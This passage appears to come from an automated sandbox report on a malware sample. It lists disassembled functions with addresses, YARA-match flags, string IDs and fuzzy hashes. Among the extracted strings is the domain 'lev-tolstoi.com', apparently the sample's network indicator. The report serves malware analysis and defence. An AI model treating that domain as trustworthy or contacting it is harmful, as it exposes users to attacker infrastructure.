                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A4205B1D042548FDB08CF78C8853AEBFF1AF49310F198279D9A9AB391D7358945CB92
                                                                                                                                                                                                                                                                Function 0040DBD9 Relevance: 3.0, Strings: 2, Instructions: 528COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: Dx$lev-tolstoi.com
                                                                                                                                                                                                                                                                • API String ID: 0-818776348
                                                                                                                                                                                                                                                                • Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                                                                                                                                                                                                                • Instruction ID: 5bb1130f72a98c6f233d2c217a903bc57bb56de3339a3108bfc93ec34e4a158e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1F1CDB054C3D18ED335CF6594907EBBBE0EB92314F144AAEC8D96B382C735090A8B97
                                                                                                                                                                                                                                                                Function 020FDE40 Relevance: 3.0, Strings: 2, Instructions: 528COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: Dx$lev-tolstoi.com
                                                                                                                                                                                                                                                                • API String ID: 0-818776348
                                                                                                                                                                                                                                                                • Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                                                                                                                                                                                                                • Instruction ID: ab29f9e84459f454c0829ee37fb37b76afef963e9afa1b3fdaa4097c18b1ae90
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7F1ECB054D3D18ED3B5CF658484BEBBFE1AB92308F184AADC8D95B652C734050ACB93
                                                                                                                                                                                                                                                                Function 0211DCBC Relevance: 2.9, Strings: 2, Instructions: 441COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 0K)$4*VP
                                                                                                                                                                                                                                                                • API String ID: 0-3626284114
                                                                                                                                                                                                                                                                • Opcode ID: 958d662d80f610fa8de2bec6fdd7d8beff1fa42db32f20cab0fd5fd8684a20d5
                                                                                                                                                                                                                                                                • Instruction ID: be95a0ee448f85f8141fc34205fa9fdd4d2919aa19831c078dfff85d5c6c32bb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 958d662d80f610fa8de2bec6fdd7d8beff1fa42db32f20cab0fd5fd8684a20d5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0D1163065D3D08ED7258B3984507ABFBE19FA7214F1889ADD4D98B382D7768406CB62
                                                                                                                                                                                                                                                                Function 0042DA53 Relevance: 2.9, Strings: 2, Instructions: 440COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 0K)$4*VP
                                                                                                                                                                                                                                                                • API String ID: 0-3626284114
                                                                                                                                                                                                                                                                • Opcode ID: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
                                                                                                                                                                                                                                                                • Instruction ID: 79d6e082e0491a4045e5b840a95bb4df230d34c241beba690eb3c8ed7007ce5a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8FD12730A1C3D08ED7258F3994507ABBFE19FA7314F59896ED4C98B382C7798406CB66
                                                                                                                                                                                                                                                                Function 004231C2 Relevance: 2.9, Strings: 2, Instructions: 432COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: R2B$6B
                                                                                                                                                                                                                                                                • API String ID: 0-20043878
                                                                                                                                                                                                                                                                • Opcode ID: ac58904699f18f78ac368c51fcd47e09c00d21abb36880cf37e6842ead4d4e32
                                                                                                                                                                                                                                                                • Instruction ID: f5db2046e1d380e536cc29ae1ea4695f6a7d49829660d0c0f3bd76f15908f1aa
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac58904699f18f78ac368c51fcd47e09c00d21abb36880cf37e6842ead4d4e32
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3AD1C276A01116CFDB18CF68DC917AE73B2FB8A311F1A85A9D841E7390DB34AD11CB58
                                                                                                                                                                                                                                                                Function 00420F50 Relevance: 2.9, Strings: 2, Instructions: 429COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: XG$|}
                                                                                                                                                                                                                                                                • API String ID: 0-1014376750
                                                                                                                                                                                                                                                                • Opcode ID: e601669f8485cc3344b93b58b39bec23c35c7299807bf4f05dda551d1a5ff6f0
                                                                                                                                                                                                                                                                • Instruction ID: fef0f9a3622c059bd3dca30c9da84c32a684abbcbc54a65241ce9b590edefb0f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e601669f8485cc3344b93b58b39bec23c35c7299807bf4f05dda551d1a5ff6f0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ECD122B16083108BD724DF18D8927ABB7F2FFE5354F49891DE5868B3A1E7788801CB56
                                                                                                                                                                                                                                                                Function 021111B7 Relevance: 2.9, Strings: 2, Instructions: 429COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: XG$|}
                                                                                                                                                                                                                                                                • API String ID: 0-1014376750
                                                                                                                                                                                                                                                                • Opcode ID: dab4d877ca047d4bef4a60ac035a74c1689232e455a040bcd58bfaed14168dbd
                                                                                                                                                                                                                                                                • Instruction ID: 45d9ef73de5609b1a366311681158484ba02acd38134e8c4456cc68dbdc7efc2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dab4d877ca047d4bef4a60ac035a74c1689232e455a040bcd58bfaed14168dbd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2D115B15487408BD724CF14C8527ABB7F1FFC2358F09892CE59A8B7A1E7799401CB52
                                                                                                                                                                                                                                                                Function 00404320 Relevance: 2.8, Strings: 2, Instructions: 329COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: )$IEND
                                                                                                                                                                                                                                                                • API String ID: 0-707183367
                                                                                                                                                                                                                                                                • Opcode ID: a91b974ffb7970066f5ddd55fbf8d6bd18980178a5d0d12c0270eeeb14f23bc6
                                                                                                                                                                                                                                                                • Instruction ID: dbf6d47144c6b822b2acdb98883b9d528113f132bac91ec627b85730d464e823
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a91b974ffb7970066f5ddd55fbf8d6bd18980178a5d0d12c0270eeeb14f23bc6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34D1CEB15083449FE720CF14D84575FBBE4AB94308F14492EFA99AB3C2E779D908CB96
                                                                                                                                                                                                                                                                Function 020F4587 Relevance: 2.8, Strings: 2, Instructions: 329COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: )$IEND
                                                                                                                                                                                                                                                                • API String ID: 0-707183367
                                                                                                                                                                                                                                                                • Opcode ID: e75c78a806b7862965fdc8e28a2ab248e9bd6dbcacf7bf91078409fb9652b6c0
                                                                                                                                                                                                                                                                • Instruction ID: 1735ba0cc4dfc2132d27eadb3272ccca2d64409675c8fc84d064116ef365eeaa
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e75c78a806b7862965fdc8e28a2ab248e9bd6dbcacf7bf91078409fb9652b6c0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6D19DB16483449FD7A0CF14C840B9BBBE5AF94304F14892DFE999B381D375E908DB92
                                                                                                                                                                                                                                                                Function 004179C1 Relevance: 2.8, Strings: 2, Instructions: 327COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID: i$r}A
                                                                                                                                                                                                                                                                • API String ID: 2994545307-2976846027
                                                                                                                                                                                                                                                                • Opcode ID: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
                                                                                                                                                                                                                                                                • Instruction ID: bf893d2c0726f4e317e2b51d5e32a95bc91f637e65c50f94937d3483e244f6d9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4781A83694C351CFD710CF68D8806ABBBE2EBD2300F18496ED8D697252C7389985C7CA
                                                                                                                                                                                                                                                                Function 0042A33F Relevance: 2.7, Strings: 2, Instructions: 211COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: d$d
                                                                                                                                                                                                                                                                • API String ID: 0-195624457
                                                                                                                                                                                                                                                                • Opcode ID: 5ae760aa5af7d138e0a7bd51aa20738c42f63bbe965dfb313ec005962f2f09c8
                                                                                                                                                                                                                                                                • Instruction ID: a6a5a8ac2d59b7de1a8b575b3a10bb681eff341670204cea3f60d1849e0cf04e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ae760aa5af7d138e0a7bd51aa20738c42f63bbe965dfb313ec005962f2f09c8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1513A36908320CBC714CF24D85162BB7D2AB8A718F494A6DECC9A7351D7369D15CB8B
                                                                                                                                                                                                                                                                Function 00418591 Relevance: 2.6, Strings: 2, Instructions: 115COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: P<?$P<?
                                                                                                                                                                                                                                                                • API String ID: 0-3449142988
                                                                                                                                                                                                                                                                • Opcode ID: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
                                                                                                                                                                                                                                                                • Instruction ID: 58e7122ac3cea56caf2700395258951e32a9ff530ffc896d1714b79e34f88e6e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64312976A44310EFD7208F54C880BBBB7A6F789300F58D92ED5C9A3251DB745C84879B
                                                                                                                                                                                                                                                                Function 0043B1D0 Relevance: 1.9, Strings: 1, Instructions: 653COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID: f
                                                                                                                                                                                                                                                                • API String ID: 2994545307-1993550816
                                                                                                                                                                                                                                                                • Opcode ID: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
                                                                                                                                                                                                                                                                • Instruction ID: 18f220f42ed12d3f8706e230857eda4cfb4a422739cf4bd3cfbe98504a66e541
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8512D3706083418FD715CF28C88176FB7E5EB89314F289A2EE6E597392D734DC058B9A
                                                                                                                                                                                                                                                                Function 0043D880 Relevance: 1.9, Strings: 1, Instructions: 641COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: bC
                                                                                                                                                                                                                                                                • API String ID: 0-3681614764
                                                                                                                                                                                                                                                                • Opcode ID: 81246caaa5fb78c3d38635f3ad354d87a7ab4eb57a3eaf3217e543b2d80e8b50
                                                                                                                                                                                                                                                                • Instruction ID: 871c5afb2dffc20ff0dbbcf53a0195aac73061a90b0e28cef4dba4d31fdaf636
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81246caaa5fb78c3d38635f3ad354d87a7ab4eb57a3eaf3217e543b2d80e8b50
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3712E23AA18215CFCB04CF28E8905AAB7B2FF8E311F1A847DD54697351D734A952CB88
                                                                                                                                                                                                                                                                Function 0043D980 Relevance: 1.8, Strings: 1, Instructions: 531COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: bC
                                                                                                                                                                                                                                                                • API String ID: 0-3681614764
                                                                                                                                                                                                                                                                • Opcode ID: c70fff483ec8e9077dfc10fa089d78eeba6ca480428d69a1677b3b3847d620ad
                                                                                                                                                                                                                                                                • Instruction ID: 5e30844967bebdc7bd1579877bde578fcf76ae60555b00215fe6639be0914efa
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c70fff483ec8e9077dfc10fa089d78eeba6ca480428d69a1677b3b3847d620ad
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7DF1E436A28215CFCB04CF28E8905AAB7F2FF8E311F19847DD94697351D734A952CB88
                                                                                                                                                                                                                                                                Function 0043D999 Relevance: 1.8, Strings: 1, Instructions: 522COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: bC
                                                                                                                                                                                                                                                                • API String ID: 0-3681614764
                                                                                                                                                                                                                                                                • Opcode ID: 1d8feeef0126ffe8c63342afaba4558ed33c57e7ba78c596c66c7e0fa34e77c1
                                                                                                                                                                                                                                                                • Instruction ID: 5e6aaad999615e2ac42fefb03cf1b536ced96fd12a8bf48793a25e995ad5db17
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d8feeef0126ffe8c63342afaba4558ed33c57e7ba78c596c66c7e0fa34e77c1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BAF1E536A28215CFCB04CF68E8905AAB7F2FF8E311F19847DD94697351D734A952CB88
                                                                                                                                                                                                                                                                Function 0043D997 Relevance: 1.8, Strings: 1, Instructions: 521COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: bC
                                                                                                                                                                                                                                                                • API String ID: 0-3681614764
                                                                                                                                                                                                                                                                • Opcode ID: b154c6e34f79c6648591b9b450c448a67bbc93cb44fa5396b7d9856807c8a211
                                                                                                                                                                                                                                                                • Instruction ID: a5988ab96186a7325d1362fbcccc642df08cbf2eaa279a3d6103cdc8c7b46e1e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b154c6e34f79c6648591b9b450c448a67bbc93cb44fa5396b7d9856807c8a211
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7F1F536A28215CFCB04CF68E8905AAB7F2FF8E311F19847DD94697351D734A952CB88
                                                                                                                                                                                                                                                                Function 00438F59 Relevance: 1.7, Strings: 1, Instructions: 496COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: jk
                                                                                                                                                                                                                                                                • API String ID: 0-78326018
                                                                                                                                                                                                                                                                • Opcode ID: 25ef1f9adb694a81f93120e111aa8eff1c89ad6ac93ee7fa2faf286b71ff90ec
                                                                                                                                                                                                                                                                • Instruction ID: 68e7885be5d05e4a2cf040f704cbb8fa7a41bea7ef2f0d8a510bf149587bd7f9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25ef1f9adb694a81f93120e111aa8eff1c89ad6ac93ee7fa2faf286b71ff90ec
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DDE1033A618356CBC7188F38DC5126B73E2FF4A351F0AC87DE9818B2A0E779C9558754
                                                                                                                                                                                                                                                                Function 0043DA80 Relevance: 1.7, Strings: 1, Instructions: 460COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: bC
                                                                                                                                                                                                                                                                • API String ID: 0-3681614764
                                                                                                                                                                                                                                                                • Opcode ID: 10f45940bf441a6cd71f6e58040424d3e031c37bab43412074f48cf734061f8b
                                                                                                                                                                                                                                                                • Instruction ID: 2fa55bda5e41fd724e566356672d144f9f42af162050902131bcbf15531586af
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 10f45940bf441a6cd71f6e58040424d3e031c37bab43412074f48cf734061f8b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9E1C376A28215CFCB08CF28E8905AAB7F2FF8E310F19857DD94697351D734A952CB84
                                                                                                                                                                                                                                                                Function 00425E30 Relevance: 1.7, Strings: 1, Instructions: 431COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: {}
                                                                                                                                                                                                                                                                • API String ID: 0-4269290415
                                                                                                                                                                                                                                                                • Opcode ID: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
                                                                                                                                                                                                                                                                • Instruction ID: 0af4e1219fe889d167e9da05173529857e0f89c87775fbd0e3160429af4db955
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82E101B5608340DFE724DF24E88176FB7B2FB85304F54893DE5859B2A2DB789805CB4A
                                                                                                                                                                                                                                                                Function 0042AC90 Relevance: 1.7, Strings: 1, Instructions: 430COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
